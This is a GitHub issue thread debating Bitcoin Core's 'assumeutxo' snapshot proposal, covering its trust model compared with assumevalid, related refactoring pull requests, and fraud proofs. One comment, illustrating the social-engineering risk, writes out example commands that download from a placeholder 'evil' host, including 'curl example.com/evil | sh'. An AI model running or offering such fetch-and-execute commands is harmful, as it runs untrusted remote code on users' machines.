Skip to content
New issue

Have a question about this project? Sign up for a free GitHub account to open an issue and contact its maintainers and the community.

By clicking “Sign up for GitHub”, you agree to our terms of service and privacy statement. We’ll occasionally send you account related emails.

Already on GitHub? Sign in to your account

assumeutxo #15605

Closed
jamesob opened this issue Mar 15, 2019 · 29 comments
Closed

assumeutxo #15605

jamesob opened this issue Mar 15, 2019 · 29 comments

Comments

@jamesob
Copy link
Member

jamesob commented Mar 15, 2019

A more detailed proposal can be found here: https://github.com/jamesob/assumeutxo-docs/tree/2019-04-proposal/proposal


I'd like to talk about the desirability of an assumeutxo feature, which would allow much faster node bootstrapping in the spirit of assumevalid. For those unfamiliar with assumeutxo, here's an informal description from one of last year's meetings:

"Assume UTXO" is an idea similar to assumevalid. In assumevalid, you have a hash that is hard-coded into the code, and you assume all the blocks in the chain that ends in that hash, that those transactions have valid scripts. This is an optimization for startup to not have to do script checks if you're willing to believe that the developers were able to properly review and validate up to that point. You could do something similar, where you cache the validity of the particular UTXO set, and it's ACKed by developers before updating the code. Anyone can independently recompute that value. There's some nuanced considerations for this [...]. The downside if you fuck up is bigger. In assumevalid, you can trick someone into thinking the block is valid if it wasn't, and assumeutxo you might be able to create coins or something; there are definitely different failure modes. So there're different security implications here. You could use assumeutxo, but you could go back and double check later. But there's nuance about how this should be done or how. You could have nodes that export this value, [and so one attack might be] you could lie to your friend I guess, but that's less scary than other things.

In other words, assumeutxo would be a way to initialize a node using a headers chain and a serialized version of the UTXO state which was generated from another node at some block height. A client making use of this UTXO "snapshot" would specify a hash and expect the content of the resulting UTXO set to yield this hash after deserialization.

This would allow users to bootstrap a usable pruned node & wallet far more quickly from a ~3GB file (at time of writing) rather than waiting for a full initial block download to complete, since we only have to sync blocks between the base of the snapshot and the current network tip. Needless to say this is at expense of operating under a different trust model (albeit temporarily), though how different this really ends up being from assumevalid in effect is worth debate.

An implementation of assumeutxo could allow background validation of the loaded UTXO snapshot to happen concurrently with use of the assumed chain, so the trust model is only relaxed for a limited amount of time. Conceptually this is pretty straightforward: you'd have two chainstates maintained simultaneously, one of which is doing an IBD from genesis up to the base of the snapshot and the other (i.e. the assumed chain) just doing tip maintenance and servicing immediate requests for chain data. Once the validation chainstate reaches the height of the snapshot base, it computes a hash of the UTXO set it built and compares it to the snapshot's hash. If it matches, we throw the validation chainstate away and continue to operate on the "assumed" (but now fully validated) chain - otherwise we pitch a fit in the logs and GUI, and either revert to the validation chainstate and continue traditional IBD or simply shutdown.

Specifying assumeutxo

The assumeutxo value/height pairings could be committed in much the same way that we currently update assumevalid. Eventually (and this is not a new idea) we could consider using a rolling UTXO set hash or some similar technology to commit to the UTXO set hash in each block header, though this of course ends up being a consensus change. This would obviate the need for any hardcoded assumeutxo value since bootstrapping nodes could obtain the headers chain, choose a UTXO set hash value at some height, and then obtain the correspondent UTXO snapshot from their peers on the basis of that hash.

Obtaining snapshots

Snapshots could be obtained from a variety of sources, whether over the peer network or centralized content distribution networks (CDNs). It doesn't really matter since security is contingent on a content hash, though if assumeutxo ends up being something we actually want to support then I'd imagine we would build a means of distribution through the peer network.

Steps

I've already drafted up an implementation of this that excludes any P2P mechanism for distributing snapshots but makes the changes necessary for loading snapshots and doing concurrent background validation. It exposes two new RPC commands, dumptxoutset and loadtxoutset, to provide a test harness for creating and loading snapshots. Whether or not we'd actually want to commit that RPC interface is something I'd like input on.

Another option is to eschew a loadtxoutset RPC and use a -utxosnapshot=<path> startup parameter.

Afterwards, supposing we get that far, we'll probably want to think about implementing P2P distribution of snapshots, and then maybe starting thinking about a rolling UTXO set hash for potential inclusion in block headers.

Questions

I'm curious for general opinions on this idea and the concrete implementation steps. If this ends up being desirable for the project, it'll require a lot of refactoring and will probably result in a lengthy succession of incremental PRs (a la the process separation effort), though I am of course happy to propose large, cohesive diffs too. :)

Specific questions I have are:

  1. Does the assumeutxo trust model differ materially from assumevalid? If so, how? Is it too aggressive a departure from our existing trust model?
  2. If we agree this is a feature worth supporting, does the sequence of "RPC commands -> hardcoded assumeutxo value, optional use, P2P distribution -> UTXO rolling set hash block header commitment" make sense?
@jamesob jamesob mentioned this issue Mar 15, 2019
18 tasks
@maflcko
Copy link
Member

maflcko commented Mar 15, 2019

I think this is materially different from -assumevalid, because there are additional safety features built into assumevalid that are not possible (as of now) for assumeutxo: assumevalid must be a block hash in a headers chain that has overall valid POW and is covered in two weeks worth of POW on top of the assumevalid block. Also, all utxo operations (adding and removing coins) before assumevalid must be fully valid except for the script check, which is optionally skipped. So you couldn't create coins out of thin air with assumevalid.
assumeutxo does not have those "belt and suspenders". So if an assumeutxo hash is put into the code base (after review), it must not be possible for a user to simply pass in (either by mistake or consciously) their own hash via command line argument or otherwise.

@luke-jr
Copy link
Member

luke-jr commented Mar 15, 2019

Concept NACK, this significantly changes Bitcoin's security model.

@sipa
Copy link
Member

sipa commented Mar 15, 2019

additional safety features built into assumevalid that are not possible (as of now) for assumeutxo: assumevalid must be a block hash in a headers chain that has overall valid POW and is covered in two weeks worth of POW on top of the assumevalid block.

I don't see why this isn't possible for assumeutxo? You would include the tip block hash in the data hashed for assumeutxo, and the UTXO set you receive would need to include that hash (stating which block it is for). If the resulting hash isn't sufficiently deeply buried in the headers chain, you reject it.

So you couldn't create coins out of thin air with assumevalid.

With assumeutxo you can still have an inflation check (because the total accumulated subsidy is known for each height), so I don't think there is a difference. The only failure an invalid assumeutxo could lead to is incorrectly assigning coins, but the same is possible right now with an invalid assumevalid (which doesn't prevent theft).

@jamesob
Copy link
Member Author

jamesob commented Mar 16, 2019

The only failure an invalid assumeutxo could lead to is incorrectly assigning coins, but the same is possible right now with an invalid assumevalid (which doesn't prevent theft).

I think there's an argument to be made that convincing someone of an incorrect coin assignment is easier in assumeutxo because under assumevalid you'd have to reconstruct a valid series of blocks (with the accompanying PoW) after the bad coin assignment. In assumeutxo, if you can convince someone to accept a malicious hash, all the attacker has to do is serialize their modified set with no concern for alternate PoW construction. You wouldn't find out about this until the background validation process catches up to the block where the incorrect assignment happened.

@maflcko
Copy link
Member

maflcko commented Mar 17, 2019

I don't see why this isn't possible for assumeutxo?

The logic itself is possible to implement in the same fashion, but not the trust model (allowing users to set the hash to an arbitrary one on the command line). With "out of thin air" I meant "without effort" (other than telling the user on my website to set -assumeutxo=myhash and then download myutxoset.dat).
That is solved, if it is absolutely not possible for the user to set the hash.

@harding
Copy link
Contributor

harding commented Apr 8, 2019

With "out of thin air" I meant "without effort" (other than telling the user on my website to set -assumeutxo=myhash and then download myutxoset.dat).

@MarcoFalke but can't the malicious party now just tell the user to wget example.com/evilutxoset.tar.gz && tar xzf evilutxoset.tar.gz? Or, if they wanted to make it look like a bitcoind configuration option, bitcoind -blocknotify "curl example.com/evil | sh".

Maybe it'd be satisfactory to just give the option a name that better hints at the danger of using it with an untrusted source, e.g. -trustedutxo or -balance-snapshot-you-trust.

@maflcko
Copy link
Member

maflcko commented Apr 10, 2019

Indeed they can. Though they might also encourage you to buy backdoored hardware. Generally Bitcoin Core assumes that the underlying architecture (hardware, filesystem, operating system, network sockets, ...) are not tampered with. There is nothing we can do to prevent that.

However, if it comes to Bitcoin Core internals, we should not allow backdoors and footguns. For example allowing users to modify consensus settings on the command line (like block size, the utxo set, ...).

For regtest it could make sense to allow setting this to simplify testing.

@jamesob
Copy link
Member Author

jamesob commented Apr 23, 2019

I've created a draft proposal for assumeutxo here: https://github.com/jamesob/assumeutxo-docs/tree/2019-04-proposal/proposal

If anyone would like to leave inline comments, the associated PR is here: jamesob/assumeutxo-docs#1

maflcko pushed a commit that referenced this issue May 7, 2019
486c1ee refactoring: remove unused chainActive (James O'Beirne)
631940a scripted-diff: replace chainActive -> ::ChainActive() (James O'Beirne)
a3a6090 refactoring: introduce unused ChainActive() (James O'Beirne)
1b6e6fc rename: CChainState.chainActive -> m_chain (James O'Beirne)

Pull request description:

  This is part of the assumeutxo project:

  Parent PR: #15606
  Issue: #15605
  Specification: https://github.com/jamesob/assumeutxo-docs/tree/2019-04-proposal/proposal

  ---

  This change refactors the `chainActive` reference into a `::ChainActive()` call. It also distinguishes `CChainState`'s `CChain` data member as `m_chain` instead of the current `chainActive`, which makes it easily confused with the global data.

  The active chain must be obtained via function because its reference will be swapped at some point during runtime after loading a UTXO snapshot.

  This change, though lengthy, should be pretty easy to review since most of it is contained within a scripted-diff. Once merged, the parent PR should be easier to review.

ACKs for commit 486c1e:
  Sjors:
    utACK 486c1ee
  promag:
    utACK 486c1ee.
  practicalswift:
    utACK 486c1ee

Tree-SHA512: 06ed8f9e77f2d25fc9bea0ba86436d80dbbce90a1e8be23e37ec4eeb26060483e60b4a5c4fba679cb1867f61e3921c24abeb9cabdfb4d0a9b1c4ddd77b17456a
sidhujag pushed a commit to syscoin/syscoin that referenced this issue May 7, 2019
486c1ee refactoring: remove unused chainActive (James O'Beirne)
631940a scripted-diff: replace chainActive -> ::ChainActive() (James O'Beirne)
a3a6090 refactoring: introduce unused ChainActive() (James O'Beirne)
1b6e6fc rename: CChainState.chainActive -> m_chain (James O'Beirne)

Pull request description:

  This is part of the assumeutxo project:

  Parent PR: bitcoin#15606
  Issue: bitcoin#15605
  Specification: https://github.com/jamesob/assumeutxo-docs/tree/2019-04-proposal/proposal

  ---

  This change refactors the `chainActive` reference into a `::ChainActive()` call. It also distinguishes `CChainState`'s `CChain` data member as `m_chain` instead of the current `chainActive`, which makes it easily confused with the global data.

  The active chain must be obtained via function because its reference will be swapped at some point during runtime after loading a UTXO snapshot.

  This change, though lengthy, should be pretty easy to review since most of it is contained within a scripted-diff. Once merged, the parent PR should be easier to review.

ACKs for commit 486c1e:
  Sjors:
    utACK 486c1ee
  promag:
    utACK 486c1ee.
  practicalswift:
    utACK 486c1ee

Tree-SHA512: 06ed8f9e77f2d25fc9bea0ba86436d80dbbce90a1e8be23e37ec4eeb26060483e60b4a5c4fba679cb1867f61e3921c24abeb9cabdfb4d0a9b1c4ddd77b17456a
@bitcoin bitcoin deleted a comment from Rockstarrecords11 May 9, 2019
@fresheneesz
Copy link

fresheneesz commented May 26, 2019

I think James's proposal addresses many of the concerns that have been brought up.

I think its worth noting that the solution to the "one practical security difference" in phase 1 or 2, is not resilient in an adversarial environment. This could be solved by having a client ask all of its connections to verify that the UTXO snapshot is correct, and if any one of its connections says the UTXO set isn't correct, the client would then the client would build the UTXO set from scratch. However, it would be easy for an attacker to force many or even most newly connecting clients to build it from scratch - which defeats the purpose of the upgrade (ie scalability). Assumevalid doesn't have this problems since verifying claims about chain validity is much easier than verifying claims about UTXO set validity. Phase 3 solves the problem in a much nicer way.

So you couldn't create coins out of thin air with assumevalid.
assumeutxo does not have those "belt and suspenders".

Even if we allow the user enter a golden UTXO hash, I believe

if it comes to Bitcoin Core internals, we should not allow backdoors and footguns. For example allowing users to modify consensus settings on the command line

I agree. And so does Pieter Wuille: "allowing [utxo snapshots] to be configured is even more scary (e.g. some website saying "speed up your sync, start with this command line flag!").". If all 3 phases of jamesob's are implemented tho, allowing the user to input a UTXO snapshot would be safe, since the client could efficiently verify the truth of the claim and ignore it if its not true.

laanwj added a commit that referenced this issue Jun 5, 2019
403e677 refactoring: IsInitialBlockDownload -> CChainState (James O'Beirne)
3ccbc37 refactoring: FlushStateToDisk -> CChainState (James O'Beirne)
4d66886 refactoring: introduce ChainstateActive() (James O'Beirne)
d7c97ed move-only: make the CChainState interface public (James O'Beirne)

Pull request description:

  This is part of the [assumeutxo project](https://github.com/bitcoin/bitcoin/projects/11):

  Parent PR: #15606
  Issue: #15605
  Specification: https://github.com/jamesob/assumeutxo-docs/tree/2019-04-proposal/proposal

  ---

  This changeset starts moving functionality intimately related to CChainState into methods. Parameterizing these functions by a particular CChainState is necessary for the use of multiple chainstates simultaneously (e.g. for asynchronous background validation).

  In this change, we
  - make the CChainState interface public - since other units will start to invoke its methods directly,
  - introduce `::ChainstateActive()`, the CChainState equivalent for `::ChainActive()`,
  - and move `IsInitialBlockDownload()` and `FlushStateToDisk()` into methods on CChainState.

  Independent of assumeutxo, these changes better encapsulate chainstate behavior and allow easier use from a testing context.

  There are more methods that we'll move in the future, but they require other substantial changes (i.e. moving ownership of the `CCoinsView*` hierarchy into CChainState) so we'll save them for future PRs.

  ---

  The first move-only commit is most easily reviewed with `git diff ... --color-moved=dimmed_zebra`.

ACKs for commit 403e67:
  Empact:
    utACK 403e677 no need to address my nits herein
  Sjors:
    utACK 403e677
  ryanofsky:
    utACK 403e677. Only change since previous review is removing global state comment as suggested.
  MarcoFalke:
    utACK 403e677, though the diff still seems a bit bloated with some unnecessary changes in the second commit.
  promag:
    utACK 403e677 and rebased with current [master](c7cfd20).

Tree-SHA512: 6fcf260bb2dc201361170c0b4547405366f5f331fcc3a2bac29b24442814b7b244ca1b58aac5af716885f9a130c343b544590dff780da0bf835c7c5b3ccb2257
sidhujag pushed a commit to syscoin/syscoin that referenced this issue Jun 6, 2019
403e677 refactoring: IsInitialBlockDownload -> CChainState (James O'Beirne)
3ccbc37 refactoring: FlushStateToDisk -> CChainState (James O'Beirne)
4d66886 refactoring: introduce ChainstateActive() (James O'Beirne)
d7c97ed move-only: make the CChainState interface public (James O'Beirne)

Pull request description:

  This is part of the [assumeutxo project](https://github.com/bitcoin/bitcoin/projects/11):

  Parent PR: bitcoin#15606
  Issue: bitcoin#15605
  Specification: https://github.com/jamesob/assumeutxo-docs/tree/2019-04-proposal/proposal

  ---

  This changeset starts moving functionality intimately related to CChainState into methods. Parameterizing these functions by a particular CChainState is necessary for the use of multiple chainstates simultaneously (e.g. for asynchronous background validation).

  In this change, we
  - make the CChainState interface public - since other units will start to invoke its methods directly,
  - introduce `::ChainstateActive()`, the CChainState equivalent for `::ChainActive()`,
  - and move `IsInitialBlockDownload()` and `FlushStateToDisk()` into methods on CChainState.

  Independent of assumeutxo, these changes better encapsulate chainstate behavior and allow easier use from a testing context.

  There are more methods that we'll move in the future, but they require other substantial changes (i.e. moving ownership of the `CCoinsView*` hierarchy into CChainState) so we'll save them for future PRs.

  ---

  The first move-only commit is most easily reviewed with `git diff ... --color-moved=dimmed_zebra`.

ACKs for commit 403e67:
  Empact:
    utACK bitcoin@403e677 no need to address my nits herein
  Sjors:
    utACK 403e677
  ryanofsky:
    utACK 403e677. Only change since previous review is removing global state comment as suggested.
  MarcoFalke:
    utACK 403e677, though the diff still seems a bit bloated with some unnecessary changes in the second commit.
  promag:
    utACK 403e677 and rebased with current [master](c7cfd20).

Tree-SHA512: 6fcf260bb2dc201361170c0b4547405366f5f331fcc3a2bac29b24442814b7b244ca1b58aac5af716885f9a130c343b544590dff780da0bf835c7c5b3ccb2257
@mandelmonkey
Copy link

Does assumeutxo offer any benefits that just bootstrapping with BIP 157/158 Neutrino whilst IBD is being performed doesn't? I suppose this is a "cleaner" approach as you are not running and extra client/service but sounds likes anybody wanting to bootstrap say a mobile full node could do so today with a lightclient/fullnode hybrid

@maflcko
Copy link
Member

maflcko commented Jun 30, 2019

Does assumeutxo offer any benefits that just bootstrapping with BIP 157/158 Neutrino whilst IBD is being performed doesn't?

blockfilters provide no means of bootstrapping your utxo set, so that you can start using all full node functionality (block/tx validation, block/tx propagation, ...) at the tip.

@mandelmonkey
Copy link

Does assumeutxo offer any benefits that just bootstrapping with BIP 157/158 Neutrino whilst IBD is being performed doesn't?

blockfilters provide no means of bootstrapping your utxo set, so that you can start using all full node functionality (block/tx validation, block/tx propagation, ...) at the tip.

thanks I meant that you have a lightclient running along side your fullnode, so you can use your wallet with the lightclient whilst your fullnode is performing IBD, once finished it switches over. assumeutxo is a cleaner option as explained here, but I am thinking in terms of mobile wallets, where having to download X megabytes after being offline for a few days/weeks is slower than using blockfilters to sync.

laanwj added a commit that referenced this issue Jul 16, 2019
682a1d0 refactoring: remove mapBlockIndex global (James O'Beirne)
55d525a refactoring: make pindexBestInvalid internal to validation.cpp (James O'Beirne)
4ed55df refactoring: add block_index_candidates arg to LoadBlockIndex (James O'Beirne)
613c46f refactoring: move block metadata structures into BlockManager (James O'Beirne)

Pull request description:

  This is part of the [assumeutxo project](https://github.com/bitcoin/bitcoin/projects/11):

  Parent PR: #15606
  Issue: #15605
  Specification: https://github.com/jamesob/assumeutxo-docs/tree/2019-04-proposal/proposal

  ---

  Under an assumeutxo model, we have multiple CChainState instances in use at once in order to support background validation. Currently, each CChainState instance has its own mapBlockIndex, a collection of linked block headers, in addition to a few other data structures that are related to maintenance of the block tree but not necessarily to any given chainstate.

  In order to avoid duplicating this data across chainstates, this change moves chainstate-agnostic block metadata (and related behavior) into a class, `BlockManager`. Chainstates are parameterized with a reference to a blockmanager instance and in practice they share the same instance.

  Most of this change is conceptually move-only, though the diff is somewhat muddled. The first commit can be reviewed slightly more easily with `--color-moved=dimmed_zebra`. Admittedly, that commit is pretty unwieldy; I tried to split it up after the fact with `git add --patch`, but that was difficult because of git's inability to split hunks past a certain point. Some of the moves also ended up being obscured when done over separate commits.

ACKs for top commit:
  MarcoFalke:
    ACK 682a1d0
  ryanofsky:
    utACK 682a1d0, only changes since last review were rebase and fixing conflict on a moved line
  ariard:
    utACK 682a1d0. Most of the changes are move-only, with main problem being to avoid creating circular dependencies between `BlockManager` and `CChainState`. Tested, comments are mostly nits, feel free to ignore them

Tree-SHA512: 738d8d06539ba53acf4bd2d48ae000473e645bbc4e63d798d55d247a4d5a4f781b73538ed590f6407be9ab402ea9d395570ea20bff0a4b9ce747bcc1600c5108
fanquake added a commit that referenced this issue Jul 23, 2019
4f050b9 move-onlyish: move CCoinsViewErrorCatcher out of init.cpp (James O'Beirne)

Pull request description:

  This is part of the [assumeutxo project](https://github.com/bitcoin/bitcoin/projects/11):

  Parent PR: #15606
  Issue: #15605
  Specification: https://github.com/jamesob/assumeutxo-docs/tree/2019-04-proposal/proposal

  ---

  This change moves `CCoinsViewErrorCatcher` out of `init` and into `coins` so that it can later be included in [a `CoinsView` instance](9128496#diff-349fbb003d5ae550a2e8fa658e475880R504) under `CChainState`.

  Instead of hardcoding read failure behavior that has knowledge of qt, it accepts error callbacks via `AddReadErrCallback()`.

ACKs for top commit:
  dongcarl:
    re-ACK 4f050b9
  ryanofsky:
    utACK 4f050b9. Only change since last review is fixing const.

Tree-SHA512: eaba21606d15d2b8d0e3db7cec57779ce181af953db1ef4af80a0bc1dfb57923d0befde9d61b7be55c32224744f7fb6bd47d4e4c72f3ccfe6eaf0f4ae3765c17
sidhujag pushed a commit to syscoin/syscoin that referenced this issue Jul 29, 2019
682a1d0 refactoring: remove mapBlockIndex global (James O'Beirne)
55d525a refactoring: make pindexBestInvalid internal to validation.cpp (James O'Beirne)
4ed55df refactoring: add block_index_candidates arg to LoadBlockIndex (James O'Beirne)
613c46f refactoring: move block metadata structures into BlockManager (James O'Beirne)

Pull request description:

  This is part of the [assumeutxo project](https://github.com/bitcoin/bitcoin/projects/11):

  Parent PR: bitcoin#15606
  Issue: bitcoin#15605
  Specification: https://github.com/jamesob/assumeutxo-docs/tree/2019-04-proposal/proposal

  ---

  Under an assumeutxo model, we have multiple CChainState instances in use at once in order to support background validation. Currently, each CChainState instance has its own mapBlockIndex, a collection of linked block headers, in addition to a few other data structures that are related to maintenance of the block tree but not necessarily to any given chainstate.

  In order to avoid duplicating this data across chainstates, this change moves chainstate-agnostic block metadata (and related behavior) into a class, `BlockManager`. Chainstates are parameterized with a reference to a blockmanager instance and in practice they share the same instance.

  Most of this change is conceptually move-only, though the diff is somewhat muddled. The first commit can be reviewed slightly more easily with `--color-moved=dimmed_zebra`. Admittedly, that commit is pretty unwieldy; I tried to split it up after the fact with `git add --patch`, but that was difficult because of git's inability to split hunks past a certain point. Some of the moves also ended up being obscured when done over separate commits.

ACKs for top commit:
  MarcoFalke:
    ACK 682a1d0
  ryanofsky:
    utACK 682a1d0, only changes since last review were rebase and fixing conflict on a moved line
  ariard:
    utACK 682a1d0. Most of the changes are move-only, with main problem being to avoid creating circular dependencies between `BlockManager` and `CChainState`. Tested, comments are mostly nits, feel free to ignore them

Tree-SHA512: 738d8d06539ba53acf4bd2d48ae000473e645bbc4e63d798d55d247a4d5a4f781b73538ed590f6407be9ab402ea9d395570ea20bff0a4b9ce747bcc1600c5108
UdjinM6 pushed a commit to UdjinM6/dash that referenced this issue Dec 1, 2020
8a3b2eb move-only: move coins statistics utils out of RPC (James O'Beirne)

Pull request description:

  This is part of the [assumeutxo project](https://github.com/bitcoin/bitcoin/projects/11):

  Parent PR: bitcoin#15606
  Issue: bitcoin#15605
  Specification: https://github.com/jamesob/assumeutxo-docs/tree/master/proposal

  ---

  In the short-term, this move-only commit will help with fuzzing (bitcoin#15606 (comment)). Later, these procedures will be used to compute statistics (particularly a content hash) for UTXO sets coming in from snapshots.

  Most easily reviewed with `git ... --color-moved=dimmed_zebra`. A nice follow-up would be adding unittests, which I'll do if nobody else gets around to it.

ACKs for top commit:
  MarcoFalke:
    ACK 8a3b2eb, checked --color-moved=dimmed-zebra

Tree-SHA512: a187d2f7590ad2450b8e8fa3d038c80a04fc3d903618c24222d7e3172250ce51badea35860c86101f2ba266eb4354e6efb8d7d508b353f29276e4665a1efdf74
PastaPastaPasta added a commit to dashpay/dash that referenced this issue Dec 15, 2020
* Backport Statoshi

This backports some of https://github.com/jlopp/statoshi.

Missing stuff: README.md and client name changes, segwit and fee estimation stats.

Fix RejectCodeToString

Fix copy-paste mistake s/InvalidBlockFound/InvalidChainFound/

* Merge bitcoin#16728: move-only: move coins statistics utils out of RPC

8a3b2eb move-only: move coins statistics utils out of RPC (James O'Beirne)

Pull request description:

  This is part of the [assumeutxo project](https://github.com/bitcoin/bitcoin/projects/11):

  Parent PR: bitcoin#15606
  Issue: bitcoin#15605
  Specification: https://github.com/jamesob/assumeutxo-docs/tree/master/proposal

  ---

  In the short-term, this move-only commit will help with fuzzing (bitcoin#15606 (comment)). Later, these procedures will be used to compute statistics (particularly a content hash) for UTXO sets coming in from snapshots.

  Most easily reviewed with `git ... --color-moved=dimmed_zebra`. A nice follow-up would be adding unittests, which I'll do if nobody else gets around to it.

ACKs for top commit:
  MarcoFalke:
    ACK 8a3b2eb, checked --color-moved=dimmed-zebra

Tree-SHA512: a187d2f7590ad2450b8e8fa3d038c80a04fc3d903618c24222d7e3172250ce51badea35860c86101f2ba266eb4354e6efb8d7d508b353f29276e4665a1efdf74

* Fix 16728

* Modernize StatsdClient

- Reuse some functionality from netbase
- Switch from GetRand to FastRandomContext
- Drop `using namespace std` and add `// namespace statsd`

* Introduce PeriodicStats and make StatsdClient configurable via -stats<smth> (enabled/host/port/ns/period)

* Move/rename tip stats from CheckBlock to ConnectBlock

* Add new false positives to lint-format-strings.py

* Add snprintf in statsd_client to the list of known violations in lint-locale-dependence.sh

* Fix incorrect include guard

* Use bracket syntax includes

* Replace magic numbers with defaults

* Move connection stats calculation into its own function

And bail out early if stats are disabled

* assert in PeriodicStats

Co-authored-by: PastaPastaPasta <6443210+PastaPastaPasta@users.noreply.github.com>

Co-authored-by: MarcoFalke <falke.marco@gmail.com>
Co-authored-by: PastaPastaPasta <6443210+PastaPastaPasta@users.noreply.github.com>
@andronoob
Copy link

In assumeutxo, if you can convince someone to accept a malicious hash, all the attacker has to do is serialize their modified set with no concern for alternate PoW construction

If we agree this is a feature worth supporting, does the sequence of "RPC commands -> hardcoded assumeutxo value, optional use, P2P distribution -> UTXO rolling set hash block header commitment" make sense?

Committing hash of UTXO set to the blockchain can bring the same PoW check to UTXO snapshots. However it's probably still not equivalent to the current assumevalid situation. The hardcoded assumevalid block hash doesn't imply data availability, the burdensome blockchain downloading is actually validating data availability without trusting the developers who specified such hash. AFAIK data availability is the main reason why fraud proofs can't work.

@andronoob
Copy link

However in reality I still wish such rolling UTXO set commitment (in consensus level) to happen, because people will still try to achieve the same UTXO snapshot goal in even less secure ways (like, downloading UTXO set from random websites to overwrite the entire chainstate subdirectory).

@fresheneesz
Copy link

The hardcoded assumevalid block hash doesn't imply data availability

Data availability for used transaction outputs is unnecessary. Availability of UTXOs at the point of the assumevalid hash is necessary, and a node will not consider a blockchain valid without it. What data availability would not be validated that you think needs to be?

without trusting the developers who specified such hash

I want to point out that you need not trust developers any more than normal with this - many many people will still be reviewing code changes, you still need to trust that distributers of the software aren't malicious (in a way that version validation eg validating GPG sig can't cover).

@andronoob
Copy link

Data availability for used transaction outputs is unnecessary. Availability of UTXOs at the point of the assumevalid hash is necessary, and a node will not consider a blockchain valid without it. What data availability would not be validated that you think needs to be?

I didn't believe it either, until I learned the story of fraud proofs.

I want to point out that you need not trust developers any more than normal with this - many many people will still be reviewing code changes, you still need to trust that distributers of the software aren't malicious (in a way that version validation eg validating GPG sig can't cover).

I was talking about committing UTXO hash into the blockchain, by the miners, rather than the current proposal (hard-coded) which trusts the developers just like assumevalid.

@fresheneesz
Copy link

I didn't believe it either, until I learned the story of fraud proofs.

Enlighten us...

committing UTXO hash into the blockchain, by the miners, rather than the current proposal (hard-coded) which trusts the developers just like assumevalid.

I see. I'm in support of that. However, I don't think it materially reduces trust in the UTXO hashes. If the software you're using is malicious, no amount of hashpower behind a UTXO hash will save you (because your software can simply decide to ignore it).

@andronoob
Copy link

andronoob commented Dec 29, 2020

Enlighten us...

I'm not sure whether I've misunderstood this topic either. I'll just try my best.

The idea of fraud proofs originated from Satoshi's whitepaper. Satoshi's whitepaper described that although SPV client cannot validate transactions on its own, it may still receive alarms from fully validating nodes, which points them to the position where something invalid appears, so that SPV client can then download & verify the pointed blocks on its own, to avoid blindly following an invalid chain with more PoW.

For example, if a transaction spends a spent coin once again, a fraud proof which consists of Merkle proofs of both the original transaction and the double-spending invalid transaction can be sent to SPV clients, then SPV clients can validate such proof without downloading blockchain, so finally SPV clients will know it's an invalid chain which shouldn't be followed.

We can see that the fraud proofs were supposed to work just like "supervision by public opinion" in real life, and even better, it was supposed to be "fact-based" rather than "opinion-based", because the fraud proofs were supposed to be succint, and, verifiable without the gigantic blockchain data.

With the help of fraud proofs, SPV was supposed to work almostly as secure as a fully validating node.

However, such strategy has a fatal flaw: to generate a fraud proof, the invalid part of the block must be known in first place. If some part of a block can't be downloaded, you can't convince other people that it's impossible to fully download such block, other people must try downloading it on their own to see whether it's truly undownloadable.

For example, a normal valid block has its own Merkle tree, where each leaf node is hash of a valid transaction. If you put something which isn't a hash at all (so that it doesn't have any known preimage) into the Merkle tree, then nobody can provide the "full block data". Fully validating nodes won't accept such malformed blocks, but SPV clients will still blindly accept Merkle proofs of such malformed blocks. Fully validating nodes can't prove it's malformed either, at best SPV clients still needs to try downloading the specified block on their own, which on the other side becomes a DoS vector that attacker can send false alarms to trick SPV clients into downloading existing (valid) blocks, wasting their bandwidth, so that the goal of lightweight SPV client is destroyed.

Back to the topic of fully validating node which just skips downloading the gigantic historical blockchain data: as long as you don't validate all blocks before the UTXO snapshot, you won't know whether some similar invalid/malformed things sneaked into those "unknown" blocks. You can't hope someone will alert you either, because you won't know whether it's a false alarm. With the default assumevalid situation, although you don't fully verify the contents of historical blocks either, it's still theoretically (it's theoretical for now, because there are cases which need some currently missing additional commitment structure, like: spending never existed UTXOs) possible to generate a fraud proof which contains objectively irrefutable evidence proving some block is violating the consensus rules.

@andronoob
Copy link

andronoob commented Dec 29, 2020

However, I don't think it materially reduces trust in the UTXO hashes. If the software you're using is malicious, no amount of hashpower behind a UTXO hash will save you (because your software can simply decide to ignore it).

AFAIK, in Bitcoin, miners are not supposed to be trusted at all, let alone comparing to developers. I never mentioned that miners can reduce trust on developers (who hard-code UTXO hashes into the software - of course, they can do much more evil things than hard-coding malicious UTXO hashes).

@andronoob
Copy link

andronoob commented Dec 29, 2020

A lot of people think that after adding (a new consensus rule enforcing miners to provide on-chain) UTXO commitments (and then brand-new full nodes can skip downloading the gigantic historical blockchain data with the help of it), Bitcoin will work in the same way it has been working up till now. After all, every bitcoin transaction is confirmed by miners. Some people just disagree with this point - maybe @luke-jr is one of them, so that he commented "Concept NACK, this significantly changes Bitcoin's security model" above.

In my opinion, as long as a typical PC with common Internet connection is still able (not "required", "forced" etc) to fully validate the entire blockchain, skipping downloading the old blocks would be fine - after all, those old blocks have been repeatedly validated for tens of thousands of times.

@fresheneesz
Copy link

fresheneesz commented Dec 29, 2020

at best SPV clients still needs to try downloading the specified block on their own

Valid uses of this would be extraordinarily rare. Even 1 block per year would be far more frequent than is at all likely. The bandwidth needed is small, even for lightweight SPV nodes.

a DoS vector that attacker can send false alarms to trick SPV clients into downloading existing (valid) blocks, wasting their bandwidth

That's true, however there is already a way of dealing with bad behavior from connected nodes: disconnect from them. As long as the network of SPV servers is decentralized and honest nodes compose a significant fraction of those SPV servers, there's a pretty low limit of possible shenanigans.

For example, let's say your pool of SPV servers consists of 70% honest nodes, and 30% malicious actors. If your SPV node is connecting to 10 SPV servers, an average of 3 of them will be malicious and can send 3 fake fraud claims that results in 3 (extra) blocks of download. After disconnecting from those 3 jokers, an average of 1 of the 3 new SPV servers they connect to will be malicious, resulting in a 4th extra block download. The last new SPV node would not usually be malicious. That's 4 extra blocks, that hardly destroys the goal of having a lightweight node.

So even if you have a massive fraction of malicious nodes, you can't realy troll SPV nodes that hard as long as they're following best practices and disconnecting from nodes that give them bad data.

as long as a typical PC with common Internet connection is still able (not "required", "forced" etc) to fully validate the entire blockchain, skipping downloading the old blocks would be fine

I think its very important that the Bitcoin community come to a consensus around bounadaries of what we consider "safe" as far as resource usage. What is the minimum resources of that "typical PC with a common internet connection"? If we need to support practical verifiability of the entire chain on below-average machines with below average resources, we need to limit the blockchain's grow much more than if we decided we only need to support practical verifiability of the entire chain by "average or better" machines etc. Once we decide on the power of machines we think we need to support, we can then calculate how big blocks can safely be.

@andronoob
Copy link

andronoob commented Dec 30, 2020

